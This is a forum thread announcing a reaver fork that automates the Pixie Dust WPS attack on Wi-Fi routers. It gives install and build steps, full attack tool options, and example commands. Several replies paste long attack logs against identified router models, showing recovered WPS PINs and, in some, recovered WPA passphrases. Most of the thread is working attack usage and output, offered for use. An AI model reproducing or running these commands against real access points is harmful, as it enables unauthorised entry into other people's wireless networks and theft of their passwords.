Reaver modification for Pixie Dust Attack



t6_x
2015-04-13, 13:48
Hello

The community has made modifications to reaver so that it performs the pixie dust attack and automates the process of recovering the pin.

Other attacks were implemented (Pin Generator) and some improvements have been made.

Development is ongoing and anyone is welcome to help.



Here is our contribution

GitHub
https://github.com/t6x/reaver-wps-fork-t6x



Overview

reaver-wps-fork-t6x is a modification done from a fork of reaver (https://code.google.com/p/reaver-wps-fork/)

This modified version uses the Pixie Dust attack to find the correct WPS pin.

The attack used in this version was developed by Wiire (https://github.com/wiire/pixiewps)



Install Required Libraries and Tools

Libraries for reaver


sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev

Tools


You must have pixiewps, created by Wiire (https://github.com/wiire/pixiewps), installed.



Compile and Install


Build Reaver

cd reaver-wps-fork-t6x-master
cd src
./configure
make

Install Reaver

sudo make install



Usage - Reaver


Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire

Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP

Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-o, --out-file=<file> Send output to a log file [stdout]
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-D, --daemonize Daemonize reaver
-a, --auto Auto detect the best advanced options for the target AP
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv for more)
-q, --quiet Only display critical messages
-K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey (Ralink, Broadcom, Realtek)
-Z, --no-auto-pass Do NOT run reaver to auto retrieve WPA password if pixiewps attack is successful
-h, --help Show help

Advanced Options:
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [5]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-n, --nack Target AP always sends a NACK [Auto]
-w, --win7 Mimic a Windows 7 registrar [False]
-X, --exhaustive Set exhaustive mode from the beginning of the session [False]
-1, --p1-index Set initial array index for the first half of the pin [False]
-2, --p2-index Set initial array index for the second half of the pin [False]
-P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
-W, --generate-pin Default Pin Generator by devttys0 team [1] Belkin [2] D-Link

Example:
reaver -i mon0 -b 00:AA:BB:11:22:33 -vv -K 1


Option (K)


The -K option 1 runs pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and the Authkey. pixiewps will try to attack Ralink, Broadcom and Realtek.

*Special note: if you are attacking a Realtek AP, do NOT use small DH Keys (-S)


Option (P)


Option (-P) in reaver puts reaver into a loop mode that does not carry the WPS protocol to or past the M4 message, to hopefully avoid lockouts. This is ONLY to be used for PixieHash collecting for use with pixiewps, NOT to 'online' bruteforce pins.
This option was made with the intent of:

- Collecting repeated hashes for further comparison and/or analysis / discovery of new vulnerable chipsets, routers etc.

- Time-sensitive attacks where the hash collecting continues repeatedly until your time frame is met.

- Scripting purposes, for those who want a way of gathering PixieHashes that may avoid lockouts, for your use case.


Usage - wash


Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire

Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files

Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-P, --file-output-piped Allows Wash output to be piped. Example. wash x|y|z...
-g, --get-chipset Pipes output and runs reaver alongside to get chipset
-h, --help Show help

Example:
wash -i mon0



Example


Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire

[+] Switching mon0 to channel 1
[?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
[+] Waiting for beacon from A.:9.:D.:....:....:...
[+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c6:66:a6:72:37:6d:......
[P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:......
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[P] WPS Model Serial Number: A978FD123BC
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:......
[P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:......
[+] Sending M2 message
[P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
[P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
[Pixie-Dust]
[Pixie-Dust] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] PSK1: dd:09:bd:24:......
[Pixie-Dust] PSK2: 77:e0:dd:00:......
[Pixie-Dust] [+] WPS pin: 9178....
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...

[Reaver Test] BSSID: A.:9.:D.:3.:..:..
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '9178....'
[Reaver Test] [+] WPA PSK: '112233'
[Reaver Test] [+] AP SSID: '....'



# wash -i mon0 -g -c 2
XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U



For any problem or suggestion, contact someone who is helping with the project.

RedOx07
2015-04-13, 14:48
I like the way you think. It makes everything easier in the long run. Good job!

But get your sources right ;) :

Perfect example:
https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-%28Offline-WPS-Attack%29

zimmaro
2015-04-13, 14:55
hi :)
thank you very much for your great contribution!!!!!!
TNX

nuroo
2015-04-13, 22:31
Awesome Sauce !! Nice job indeed.

When run from root I get the error below. Yes, I did sudo make install after compiling.

root@kali:~# reaver -i mon0 -b 08:**:0C:**:F4:** -vv -S -N -K1

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>

[+] Waiting for beacon from 08:**:0C:**:F4:**
[+] Switching mon0 to channel 1
[+] Associated with 08:**:0C:**:F4:** (ESSID: TG1672GE2)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 91:80:26:70:44:a0:80:c9:f1:93:f7:f8:44:88:f0:b7
[P] PKE: fa:6b:67:04:ce:29:9b:e7:9f:2d:7c:8b:9e:c5:9d:3b:1e:84:5c:cb:64:93:02:bb:29:3e:d0:5b:32:04:70:98:dc:d1:38:75:e3:68:54:5e:8f:3f:62:44:0c:08:06:89:58:a7:ba:08:59:91:7b:ee:63:e4:74:6a:47:de:f1:87:1c:ea:4d:47:2e:db:fe:41:51:e7:13:a2:55:85:b4:4d:98:d5:46:aa:4f:54:56:fe:4a:9a:b9:21:57:d8:ec:31:d6:61:b6:fe:55:e7:77:39:40:bc:d7:18:29:b8:c4:47:25:aa:3b:06:d7:f4:9a:72:72:cb:b4:30:a1:49:a7:97:b6:37:2f:76:4a:3d:c9:1d:0c:f1:75:ea:58:62:cc:a8:53:78:bf:93:fa:50:eb:5e:4f:2a:59:6e:ba:07:b5:d2:d7:b5:ca:2d:a4:57:3c:7a:87:61:26:dc:52:64:50:11:0e:4c:90:74:40:50:ae:9f:a5:b9:c1:9e:3f:38:93:a4
[P] WPS Manufacturer: Celeno Communication, Inc.
[P] WPS Model Number: CL1800
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
[P] AuthKey: e1:21:a3:c4:34:de:bb:59:e2:8c:49:74:58:8e:79:f0:2f:b8:29:07:af:3d:62:2f:2a:9c:9e:61:9e:02:08:f0
[+] Sending M2 message
[P] E-Hash1: dc:fc:c2:c3:93:65:d6:15:f1:b6:3d:67:f3:39:61:0f:22:aa:78:a3:5d:41:eb:6d:67:fd:fc:bf:83:d4:f3:ee
[P] E-Hash2: ad:95:ea:36:96:ec:bc:16:47:b6:b6:d1:49:90:e4:eb:d7:cd:20:ff:84:92:d0:b2:fc:e0:75:37:d8:4d:92:0c
[Pixie-Dust]
[Pixie-Dust] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] PSK1: 4a:72:15:42:21:4b:69:ef:10:a4:41:bd:df:75:01:a8
[Pixie-Dust] PSK2: 24:85:d0:a8:e4:20:c5:9d:04:d7:da:67:a6:df:af:3f
[Pixie-Dust] [+] WPS pin: 8127****
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...

[Reaver Test] BSSID: 08:**:0C:**:F4:**
[Reaver Test] Channel: 1
sh: 1: ./reaver: not found

When run from the src directory it works........

root@kali:~/reaver-wps-fork-t6x-master/src# reaver -i mon0 -b 08:**:0C:**:F4:** -vv -S -N -K1

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>

[+] Waiting for beacon from 08:**:0C:**:F4:**
[+] Switching mon0 to channel 1
[+] Associated with 08:**:0C:**:F4:** (ESSID: TG1672GE2)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: aa:c5:79:80:9d:3b:cc:46:7a:d5:c9:f5:b5:20:ae:bf
[P] PKE: fa:6b:67:04:ce:29:9b:e7:9f:2d:7c:8b:9e:c5:9d:3b:1e:84:5c:cb:64:93:02:bb:29:3e:d0:5b:32:04:70:98:dc:d1:38:75:e3:68:54:5e:8f:3f:62:44:0c:08:06:89:58:a7:ba:08:59:91:7b:ee:63:e4:74:6a:47:de:f1:87:1c:ea:4d:47:2e:db:fe:41:51:e7:13:a2:55:85:b4:4d:98:d5:46:aa:4f:54:56:fe:4a:9a:b9:21:57:d8:ec:31:d6:61:b6:fe:55:e7:77:39:40:bc:d7:18:29:b8:c4:47:25:aa:3b:06:d7:f4:9a:72:72:cb:b4:30:a1:49:a7:97:b6:37:2f:76:4a:3d:c9:1d:0c:f1:75:ea:58:62:cc:a8:53:78:bf:93:fa:50:eb:5e:4f:2a:59:6e:ba:07:b5:d2:d7:b5:ca:2d:a4:57:3c:7a:87:61:26:dc:52:64:50:11:0e:4c:90:74:40:50:ae:9f:a5:b9:c1:9e:3f:38:93:a4
[P] WPS Manufacturer: Celeno Communication, Inc.
[P] WPS Model Number: CL1800
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
[P] AuthKey: 0a:6b:15:aa:53:0d:c3:5f:56:bc:46:3a:a1:1a:89:26:ba:51:5b:1b:f6:9f:92:b3:c2:87:61:0b:e8:ce:c1:57
[+] Sending M2 message
[P] E-Hash1: 81:7e:70:4a:1e:62:f8:1f:d4:92:f3:60:0d:ea:52:a0:37:ca:75:e3:43:03:ca:fa:2b:60:5d:bf:33:03:9b:d8
[P] E-Hash2: 82:c1:62:2c:ff:00:81:f6:46:14:44:f3:2f:f8:f1:95:60:73:da:1d:b6:8e:fc:bb:f0:cd:ff:f9:ce:25:76:63
[Pixie-Dust]
[Pixie-Dust] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] PSK1: dc:64:ee:9b:dc:4e:39:e5:9c:a7:f4:82:d5:b1:e2:8d
[Pixie-Dust] PSK2: 1d:7b:f9:0d:9c:0a:d8:a7:68:7e:3f:47:7b:59:e8:f9
[Pixie-Dust] [+] WPS pin: 8127****
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...

[Reaver Test] BSSID: 08:**:0C:**:F4:**
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '8127****'
[Reaver Test] [+] WPA PSK: 'TG1672GD8****'
[Reaver Test] [+] AP SSID: 'TG1672GE2'

Probably my fault, just post my result, great job

t6_x
2015-04-13, 22:50
Probably my fault, just post my result, great job

Oops, forgot to commit to GitHub lol, it's my fault, sorry.

Commit done.

Sorry for that.

I added a new option (-Z); with the -Z option it does not try to get the password automatically, it stops executing when it finishes running pixiewps.

I will add another option to output data to a file; when it's ready I will commit.

I will improve the initial post a bit.

sorry again.

nuroo
2015-04-14, 01:12
U Fixed it. :cool:

-Z works correctly also

g0tmi1k
2015-04-14, 07:38
Job well done =).

t6_x
2015-04-14, 17:12
Thank you very much, g0tmi1k



New version available

-P option of wash, created by t6x (displays the output of wash with pipes)


root@kali:~/# wash -i mon0 -P
XX:XX:XX:XX:XX:XX| 1|-64|1.0|No |Wifi1
XX:XX:XX:XX:XX:XX| 2|-53|1.0|No |Wifi2


-P option of reaver, created by DataHead (M3 loop)


Reaver remains looping at the M3 stage

nuroo
2015-04-14, 22:01
Nice work....
-P option works great, takes less screen space if multiple terminals are running.

wash -i wlan1mon -P
00:00:00:00:1E:90| 1|-60|1.0|Yes|DG1600000
00:00:00:00:62:6C| 1|-55|1.0|No |Kirin00000
00:00:00:00:46:00| 1|-59|1.0|Yes|DG1600000
00:00:00:00:5C:C0| 1|-46|1.0|No |DG160000
00:00:00:00:5B:6F| 1|-64|1.0|No |PS00000
00:00:00:00:23:97| 1|-63|1.0|No |TH0000
00:00:00:00:A9:5E| 1|-57|1.0|No |DVW000000
00:00:00:00:08:86| 4|-58|1.0|Yes|H0000
00:00:00:00:37:56| 6|-47|1.0|No |133 00000
00:00:00:00:AD:00| 6|-47|1.0|No |Tomm00000
00:00:00:00:07:00| 6|-58|1.0|Yes|Tupp000000
00:00:00:00:AD:18| 6|-62|1.0|No |McP000000
00:00:00:00:4E:50| 6|-52|1.0|No |DG10000000
00:00:00:00:52:A1| 6|-57|1.0|No |133 00000
00:00:00:00:B6:D0| 6|-45|1.0|No |We he0000000
00:00:00:00:93:21| 8|-55|1.0|No |Trou0000000
00:00:00:00:A2:70| 9|-52|1.0|No |TG160000000
00:00:00:00:3E:6B|11|-41|1.0|No |DVW0000000
00:00:00:00:9F:00|11|-66|1.0|No |SterlingWattersDraperPrice
00:00:00:00:07:10|11|-47|1.0|Yes|DG0000000
00:00:00:00:03:D9|11|-55|1.0|No |NET000000
00:00:00:00:E8:86|11|-54|1.0|No |9060000000
00:00:00:00:81:F0|11|-49|1.0|Yes|TG0000000
00:00:00:00:A7:86|11|-30|1.0|No |b0c50000000
00:00:00:00:45:00|11|-60|1.0|No |Pan000000

Maybe make a change on your fork's GitHub page:

Build Reaver

cd reaver-1.4 to cd reaver-wps-fork-t6x-master
cd src
./configure
make

Install Reaver

sudo make install

Also thanks for the credit.... :D but you typo'd my name. :(


Question/Idea
If option -K1 fails, does it automatically try -K2 or -K3?
If -K3 fails, does it check -K1 etc.?

or

Does the user have to enter a new command line each time?

soxrok2212
2015-04-14, 22:27
Another idea... have all the extra stuff print only with verbosity mode selected :D

Update: I'm getting a segmentation fault when I use -K 1 and -K 3



root@Kali:~# reaver -i mon0 -c 1 -b B4:75:0E:XX:XX:XX -vv -a -K 3 -P

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>
mod by DataHead

[+] Switching mon0 to channel 1
[+] Waiting for beacon from B4:75:0E:XX:XX:XX
[+] Associated with B4:75:0E:XX:XX:XX (ESSID: *****)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 6b:35:4d:6f:05:8e:9c:80:55:68:25:4f:17:42:31:0d
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Belkin International
[P] WPS Model Number: F9K1105 v2
[+] Received M1 message
[P] PKR: dc:4c:e3:b4:b2:4a:d1:e8:39:3c:bf:b8:f1:e6:01:ab:2a:3c:6b:0d:7b:07:71:5c:b9:08:b4:e4:65:c1:4a:0b:71:11:90:24:66:05:57:6a:48:9b:ba:ae:20:20:5b:e2:83:92:b0:9d:bb:d3:7c:9f:44:e7:af:72:50:c2:76:7d:ac:34:62:62:4e:3b:f3:35:7e:e5:03:c2:7d:36:76:df:91:45:71:a0:32:04:0f:9b:92:85:18:0c:d8:c1:d5:e4:fd:17:07:26:47:36:49:37:80:80:e6:14:c9:50:76:3b:7a:38:99:5f:35:96:1c:53:2a:0d:8f:ab:48:b0:1f:1a:21:06:27:41:2b:b0:26:13:79:e7:a9:51:e7:cd:e1:95:f1:c9:a9:7b:84:8c:c5:ea:4e:27:14:bb:30:01:87:a9:d9:c0:07:0d:81:e0:62:a8:38:70:d0:3d:54:8e:49:9c:1c:e8:42:4a:ea:0f:73:f1:a7:80:01:31:e2:14:02:4e
[P] AuthKey: 03:c2:33:e0:d1:66:13:c1:d8:8f:a5:00:59:db:fc:8e:40:5d:2d:de:d7:8d:b4:97:ea:d9:c0:75:3d:71:c9:37
[+] Sending M2 message
[P] E-Hash1: 3a:9e:57:08:f3:fb:e1:ef:13:22:98:34:40:af:ef:cb:f7:00:ba:48:2b:7d:34:18:7f:c0:2d:80:9b:c2:7e:96
[P] E-Hash2: 3c:70:b6:aa:df:50:a8:e3:c8:e7:20:7e:bd:01:38:2e:63:4f:e4:9f:c8:26:fe:23:0c:2c:e6:67:16:08:e1:71
Segmentation fault

nuroo
2015-04-15, 01:00
No segmentation fault for me, however:

If no pin is found, it's OK: it then exits.


root@kali:~# reaver -i wlan3mon -b C4:.............. -vv -a -K3 -P

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>
mod by DataHead

[+] p1_index set to 1
[+] p2_index set to 0
[+] Restored previous session
[+] Waiting for beacon from C4:..............
[+] Switching wlan3mon to channel 1
[+] Switching wlan3mon to channel 2
[+] Switching wlan3mon to channel 3
[+] Switching wlan3mon to channel 4
[+] Switching wlan3mon to channel 5
[+] Switching wlan3mon to channel 6
[+] Associated with C4:.............. (ESSID: TP-*********)
[+] Starting Cracking Session. Pin count: 1, Max pin attempts: 11000
[+] Trying pin 00005678.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: dc:71:07:21:ab:fd:d2:8e:9a:63:b0:1c:e3:43:2f:6e
[P] PKE: 7b:4b:4f:84:3c:94:ef:c9:64:39:c8:f6:43:3d:ce:24:8f:c7:5a:f1:c8:49:e4:b0:29:35:e0:d4:e9:10:ee:a4:85:c6:07:50:98:cf:49:18:a7:31:c3:85:2a:cd:ec:82:57:fd:f6:60:8c:78:18:2b:d4:39:95:04:d8:73:ac:43:60:d9:4d:06:ae:b9:0f:62:47:a6:f9:70:80:79:7d:45:3f:0a:00:fb:d0:44:f2:f7:5b:62:12:5d:7f:ce:4d:e4:5c:d3:47:10:9a:f7:5c:8b:46:a7:93:dc:04:4f:15:7e:e4:3a:77:20:b4:a4:45:a4:6b:9b:a5:61:c0:e9:c3:55:bc:e3:39:8e:82:df:24:1f:15:e7:f1:a9:86:6e:b7:7a:35:a5:26:5a:28:ef:0e:94:39:2c:18:ce:ca:3d:93:a5:b3:a5:80:f3:e7:33:13:ec:88:9c:60:69:b7:04:14:ca:d2:07:b1:7c:cf:67:43:72:0a:66:65:29:90:bf:59:94
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 1.0
[+] Received M1 message
[P] PKR: b9:de:9f:be:19:9a:92:78:4b:fc:b1:0f:dc:0d:5b:db:e6:b2:85:c6:96:1d:f1:93:66:59:06:53:7d:62:01:7d:bf:96:3c:8e:ed:c8:e6:08:f1:4a:48:c2:a5:f6:08:51:8e:1b:01:38:69:b0:d4:cd:d9:ef:1d:f0:4e:82:46:b3:cf:19:aa:1c:2e:e5:dc:4e:10:7c:71:c3:69:77:32:fe:2f:27:dc:d9:0e:20:2f:64:55:2d:58:d0:79:ee:dd:7d:70:04:13:62:3f:c3:39:c0:32:f5:83:3c:80:ba:b6:b6:37:9b:89:12:05:65:52:65:ac:e4:1f:fb:2c:31:aa:da:d4:f3:36:b1:04:2e:e0:a8:bd:4d:68:ca:13:98:2b:32:eb:81:ee:7c:e8:8d:ae:95:6e:06:08:4c:b2:f6:cc:26:c7:7a:7b:e3:03:f5:17:30:8a:c7:22:93:5c:79:d9:11:d0:73:8c:37:44:72:33:70:49:c6:ba:3d:0c:50:56:42
[P] AuthKey: c9:6a:f4:8d:ea:95:40:09:31:59:15:ee:fd:8c:f4:84:2b:e7:6c:b1:89:8f:80:c8:a4:85:71:d4:57:e8:b5:75
[+] Sending M2 message
[P] E-Hash1: 32:2d:a3:b9:96:e3:a6:5e:92:ad:93:33:9a:08:00:d9:be:87:b8:a1:ee:9d:70:6f:c3:5d:2e:91:63:ab:d6:dc
[P] E-Hash2: 55:95:0f:16:3c:33:bb:c8:31:2f:ff:f6:c3:45:09:ee:e3:ba:f9:d6:f9:15:c0:36:69:3b:1c:e2:9d:f8:cd:25
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]

But if a pin is found, it hangs:

root@kali:~# reaver -i wlan3mon -b 8C:.......... -vv -a -K3 -P

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>
mod by DataHead

[+] Waiting for beacon from 8C:..........
[+] Switching wlan3mon to channel 1
[+] Switching wlan3mon to channel 2
[+] Switching wlan3mon to channel 3
[+] Switching wlan3mon to channel 4
[+] Switching wlan3mon to channel 5
[+] Switching wlan3mon to channel 6
[+] Switching wlan3mon to channel 7
[+] Switching wlan3mon to channel 9
[+] Associated with 8C:.......... (ESSID: TG167*****)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 2c:62:2f:3c:6f:e9:d4:75:92:a3:d3:e4:59:a0:92:bc
[P] PKE: db:4c:8c:5d:1c:61:a0:b5:dd:4c:4b:6a:0a:59:02:c2:46:af:29:53:d4:14:77:9e:b4:0f:48:bc:95:40:6e:ed:e4:9a:08:46:29:78:a4:fe:6a:e2:45:65:73:cf:01:b1:4c:34:60:fa:87:30:7b:d2:6a:7a:fc:7d:7d:2f:8e:55:ab:43:e7:e9:87:31:2a:dc:08:e6:3e:2b:d3:80:93:ab:5c:c4:c5:93:07:6d:19:85:f1:39:56:55:6b:93:bb:ce:09:72:e6:b5:76:00:bb:ea:f7:04:ad:2d:71:83:2a:21:a5:dd:68:1f:dc:a4:88:6b:8c:8a:4d:39:a0:53:a1:3c:2c:c5:15:4c:15:03:db:f7:01:e6:fd:22:05:17:0d:86:07:44:c7:18:8c:9d:b7:fc:13:8a:0c:01:7b:38:c8:ca:05:99:e3:1f:4a:07:10:9b:19:b5:03:02:56:32:30:1a:57:b5:db:92:48:c1:f3:3e:45:e8:60:c4:ef:2e:87:79
[P] WPS Manufacturer: Celeno Communication, Inc.
[P] WPS Model Number: CL1800
[+] Received M1 message
[P] PKR: 04:10:d7:4d:a0:29:b4:8e:00:85:85:47:cd:bc:5f:84:da:c0:c8:4a:f2:36:8c:56:5c:00:28:a8:90:31:14:11:0e:24:d8:e2:fe:8f:58:db:8c:f1:28:f9:e3:81:f7:93:2a:2e:10:3c:f5:ec:55:ba:95:a0:87:73:c6:83:00:f2:1f:e0:00:80:6c:c9:1f:5c:76:6f:27:df:c9:25:21:58:e5:24:c8:26:80:67:d4:18:ab:68:79:bd:06:ac:b9:0b:7d:75:68:52:99:0c:c3:1c:30:1c:80:a1:c1:49:5a:29:b6:ac:98:b5:b6:c3:c4:fe:67:80:02:ae:9f:f7:ef:34:41:02:39:e5:f6:6b:ec:73:19:b5:be:75:ed:ed:ac:d6:e4:0c:68:7a:b8:a7:a6:fe:98:9e:7f:00:3a:78:b3:69:df:9c:13:fc:8f:50:58:01:31:5a:1b:8c:81:5d:47:99:1b:d9:0a:8b:b0:49:6f:9b:1a:af:25:31:c5:10:13:8c
[P] AuthKey: eb:35:cb:40:af:86:fd:1d:8d:bb:2e:8b:82:f8:02:e5:3d:19:3b:9d:6a:2d:52:d2:97:49:dd:97:48:e6:41:db
[+] Sending M2 message
[P] E-Hash1: b9:76:ae:bd:db:d4:18:bc:2d:31:2f:24:02:d5:c4:a6:82:15:2e:00:da:de:98:dd:4e:a9:bd:fc:ee:b4:bc:cd
[P] E-Hash2: a3:9b:6a:34:d8:39:7f:9e:07:21:68:b3:67:ed:82:42:08:61:e4:25:96:6d:4d:93:d6:ba:1f:38:aa:3f:09:0f
[Pixie-Dust]
[Pixie-Dust] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
